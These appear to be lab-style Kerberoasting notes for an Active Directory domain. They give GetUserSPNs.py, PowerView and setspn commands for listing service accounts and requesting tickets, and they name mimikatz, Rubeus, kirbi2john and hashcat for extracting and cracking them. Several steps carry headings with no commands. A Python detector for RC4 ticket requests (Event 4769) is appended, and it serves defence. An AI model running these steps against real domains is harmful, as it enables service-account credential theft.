🔥 Kerberoasting

Linux

Kerberoasting with GetUserSPNs.py

  • Listing SPN accounts:

GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/forend

  • To get TGS ticket:

GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/forend -request-user sqldev

Or just -request works too.

Windows

Automated

Powerview

  • To import and view all users

Import-Module .\PowerView.ps1
Get-DomainUser * -spn | select samaccountname

  • Exporting all tickets to a CSV file

  • Viewing it

Rubeus

  • Check options

  • To check stats:

  • To get hash

To get an RC4-encrypted (etype 23) ticket, use /tgtdeleg.

Manual

  • Enumerating SPNs:

setspn.exe -Q */*

  • Targeting single user:

  • Retrieving all tickets:

  • Extracting tickets from memory using mimikatz:

  • Now to crack:

Use kirbi2john, then modify the crack_file produced by kirbi2john:

Now run the output through hashcat
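Seen from the domain controller, the service ticket requests on this page are logged as Event ID 4769. The sketch below is an added detection example, not part of the original notes: it flags accounts that request RC4 (etype 23, logged as 0x17) tickets for several user-backed services in a short window. The sample events, the svc_web, svc_backup, alice, bob and DC01$ names, the window and the threshold are constructed assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = "0x17"  # etype 23 as logged in the TicketEncryptionType field

def ev(time, user, service, etype, status="0x0"):
    """Build one constructed Event ID 4769 record (Security-log field names)."""
    return {"EventID": 4769, "time": time, "ServiceName": service, "Status": status,
            "TargetUserName": f"{user}@INLANEFREIGHT.LOCAL", "TicketEncryptionType": etype}

# Constructed sample data: only forend and sqldev appear on the page itself.
SAMPLE_EVENTS = [
    ev("2024-01-10T09:00:01", "forend", "sqldev", "0x17"),
    ev("2024-01-10T09:00:03", "forend", "svc_web", "0x17"),
    ev("2024-01-10T09:00:06", "forend", "svc_backup", "0x17"),
    ev("2024-01-10T09:02:00", "alice", "sqldev", "0x12"),   # AES256, normal
    ev("2024-01-10T09:03:00", "bob", "DC01$", "0x17"),      # machine account
    ev("2024-01-10T09:04:00", "bob", "sqldev", "0x17"),     # single RC4 request
]

def find_kerberoast_candidates(events, window=timedelta(minutes=5), threshold=3):
    """Map each requesting account to the distinct user-backed services it asked
    RC4 tickets for, when at least `threshold` of them fall inside `window`."""
    hits = defaultdict(list)
    for e in events:
        svc = e["ServiceName"]
        if e["EventID"] != 4769 or e["Status"] != "0x0":
            continue  # only successful service ticket requests
        if e["TicketEncryptionType"].lower() != RC4_HMAC:
            continue  # AES tickets are the expected default
        if svc.endswith("$") or svc.lower() == "krbtgt":
            continue  # machine accounts and krbtgt are background noise
        hits[e["TargetUserName"]].append((datetime.fromisoformat(e["time"]), svc))
    flagged = {}
    for account, reqs in hits.items():
        reqs.sort()
        for i, (start, _) in enumerate(reqs):
            services = {s for t, s in reqs[i:] if t - start <= window}
            if len(services) >= threshold:
                flagged[account] = sorted(services)
                break
    return flagged

if __name__ == "__main__":
    for account, services in find_kerberoast_candidates(SAMPLE_EVENTS).items():
        print(f"ALERT {account} requested RC4 tickets for: {', '.join(services)}")
```

A single targeted request (the -request-user case) stays under the default threshold; where service accounts support AES, running with threshold=1 treats any 0x17 ticket for a user-backed service as worth review.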
